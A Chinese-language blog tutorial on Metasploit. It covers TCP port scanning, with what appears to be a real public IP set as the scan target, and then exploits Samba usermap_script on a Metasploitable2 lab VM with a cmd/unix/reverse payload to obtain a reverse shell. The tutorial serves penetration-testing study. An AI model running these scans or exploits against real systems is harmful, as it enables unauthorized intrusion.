渗透之metasploit技术-端口扫描,漏洞利用

8 篇文章 0 订阅
2 篇文章 1 订阅

一,使用主机模块进行端口扫描
启用metasploit msfconsole
在这里插入图片描述
检查有哪些可用端口。

search portscan

在这里插入图片描述
使用TCP扫描模块并检查有那些参数需要设置。

use [模板]
show options

在这里插入图片描述
设置待扫描的IP地址(RHOSTS),设置扫描的端口范围(PORTS),设置扫描的线程(THREADS),最后使用show options查看设置的参数。run,运行。

set RHOSTS [设置待扫描的IP地址]
set PORTS 1-500
set threads 20
show options

在这里插入图片描述
也可以使用unset取消某个参数。
这里取消的是ip地址,最后可看见开放了21端口。

unset rhosts
set rhosts 122.1.96.34
run

在这里插入图片描述
另外,还有两条命令,setg和unsetg。两者用于设置或者取消全局的参数值。
说明:metasploit也可以配合nmap使用。
重点:实战不要使用msf扫描,nmap是最佳选择。

渗透利用

此次模拟目标机是自我搭建的metasploitable2,攻击机为kali。

直接放入虚拟机种运行即可。
metasploitable2的默认账号密码都是msfadmin

在metasploitable2上查看ip。
在这里插入图片描述
kali上对目标ip进行扫描。

nmap -sV 192.168.102.134

在这里插入图片描述
从扫描结果中发现目标ip运行着Samba服务。

简介 Samba是一个能让Linux系统应用Microsoft网络通讯协议的软件,而SMB是Server Message Block的缩写,即为服务器消息块,SMB主要是作为Microsoft的网络通讯协议,后来Samba将SMB通信协议应用到了Linux系统上,就形成了现在的Samba软件。

在msf种搜索samba漏洞利用模块

search samba

在这里插入图片描述

发现漏洞利用模块exploit/multi/samba/usermap_script,rank是 excellent,是最好的,所以使用找个模块。

查看目标利用模块。

info exploit/multi/samba/usermap_script 

在这里插入图片描述
使用漏洞利用模块并且查看可用于攻击的payload

use exploit/multi/samba/usermap_script 
show payloads

在这里插入图片描述
这里我们使用cmd/unix/reverse

set payload cmd/unix/reverse

在这里插入图片描述

  • 设置攻击的目标机的ip
  • 设置漏洞利用的端口号
  • 设置攻击机的主机ip
    在这里插入图片描述
    运行。在攻击成功后,可以看到目标机和攻击机之间建立了一个shell连接。
    在这里插入图片描述
  • 9
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值